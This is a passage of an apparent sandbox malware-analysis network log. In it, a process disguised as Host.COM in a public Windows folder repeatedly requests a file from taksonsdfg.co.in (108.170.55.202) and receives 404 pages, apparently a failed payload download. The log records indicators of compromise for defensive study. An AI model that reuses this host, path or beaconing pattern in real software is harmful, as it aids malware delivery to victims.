                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 50080 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:37 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:37 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:37 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 50088 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:38 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:38 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:38 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 50096 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:39 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:39 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:39 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 50107 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:40 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:40 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:40 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:40 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    73 | 192.168.2.4 | 50114 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:41 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:41 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:41 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:41 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:41 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    74 | 192.168.2.4 | 50126 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:42 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:42 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:42 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:42 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:42 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    75 | 192.168.2.4 | 50133 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:43 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:44 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:44 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:44 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:44 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    76 | 192.168.2.4 | 50145 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:45 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:45 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:45 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:45 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:45 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    77 | 192.168.2.4 | 50153 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:46 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:46 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:46 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:46 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:46 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    78 | 192.168.2.4 | 50160 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:47 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:47 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:47 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:47 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:47 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    79 | 192.168.2.4 | 50162 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:48 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:48 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:48 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:48 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:48 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50164 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:49 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:50 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:49 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:50 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:50 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50166 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:50 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:51 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:51 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:51 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:51 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50168 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:52 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:52 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:52 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:52 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:52 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 50170 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:53 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:53 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:53 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:53 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:53 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50172 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:54 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
